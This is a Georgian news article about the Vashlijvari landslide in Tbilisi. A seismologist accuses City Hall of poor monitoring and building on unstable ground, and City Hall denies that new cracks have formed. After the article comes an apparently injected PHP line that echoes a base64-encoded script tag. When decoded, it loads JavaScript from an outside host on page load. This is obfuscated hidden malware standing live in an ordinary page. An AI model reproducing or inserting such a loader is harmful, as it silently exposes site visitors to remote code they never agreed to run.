celsiusi
ავერსი საქკაბელი
„სისულელის კეთებასაც არ ჰქონია საზღვარი“– წერს სოციალურ ქსელში დედამიწის შემსწავლელ მეცნიერებათა ინსტიტუტისა და სეისმური მონიტორინგის ეროვნული ცენტრის დირექტორი თეა გოდოლაძე და ვაშლიჯვრის მეწყერზე გადაღებულ ფოტოს აზიარებს. 
 
მისივე თქმით, ეს არის დინამიკაში მოსული უზარმაზარი მეწყრული სხეული და რაც აქ ხდება, შორსაა მონიტორინგის სტანდარტებისაგან.
 
„ამ ეტაპზე, არ ვიცით რა საინჟინრო გადაწყვეტილებაა შესაძლებელი, იმის გათვალისწინებით, რომ რეალურად არანაირი კომპლექსური მონიტორინგი და კვლევა არ არსებობს. 24 საათიანი მონიტორინგი არ არის. 
ჩვენი იდეა იყო, შესწავლა და მერე US Army Corpის მოწვევა საინჟინრო გადაწყვეტილებისათვის. მერიამ ამერიკელები არ მიაკარა საქმეს. მარტივი გასათვლელია რატომ.
 
გერმანიის გეოლოგია არ არის კავკასიის გეოლოგია. ამიტომ, აქ არ მუშაობს გერმანული რეცეპტები და აქ რომ სოსულელეები აკეთეს და ცხადია რატომაც , ფაქტია. გერმანელებმა გვითხრეს, ჩვენ არ დაგვაბრალოთ ესენი რა იდიოტობებსაც გააკეთებენო.
 
მანდ მშენებლობა საერთოდ არ შეიძლებოდა, ეგ მეწყერი გუშინდელი არ არის, გეოლოგიური დრო, მილიონი წლებია. მანდ ნამეწყრალის კვალია ყველგან. გაფუჭებულზე კიდევ, საბჭოთა კორუმპირებულ გეოლოგებს არ დავუძახებდი და გერმანელებს პირში ბურთს არ ჩავჩრიდი. ყველა ცნობილ ინჟინერს დავუძახებდი, კონსოლიუმს მოვიწვევდი, თორემ გეოლოგიური კუთხით, მაგ მეწყერს აღარაფერი ეშველება, შეუქცევად დინამიკაშია.
 
ბუნებრივი მოვლენების წინააღმდეგ ვერ წახვალთ. რაც არ უნდა მილიონობით ფული ყაროს მერიამ მეწყერის შემაკავებელი კედლის შენებაში, წყალში გადაყრილი ფულია. უნდა მოერიდოთ. გეოლოგიურად ყველგან მშენებლობა არ შეიძლება. ანაბანაა.“ – წერს თეა გოდოლაძე კომენტარებში პასუხისას დაინტერესებულ ადამიანებს.
 
 
ცნობისთვის, თბილისის მერია დღეს გავრცელებულ ინფორმაციას, ვაშლიჯვარში ახალი მეწყერული ნაპრალების გაჩენის შესახებ გამოეხმაურა.
 
„ვაშლიჯვარში არსებულ მეწყრულ ზონაში ახალი ნაპრალები არ შეინიშნება. ძველი ნაპრალები, რომელიც თიხით იყო შევსებული, თოვლის და წვიმის ზემოქმედებით თიხისგან გადაირეცხა, რაც ბუნებრივი პროცესია და საჭიროებს პერიოდულ შევსებას. მეწყრული ფერდი მუდმივი მონიტორინგის ქვეშაა და ამ ეტაპზე არანაირ ცვლილებას არ განიცდის“
 
899
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");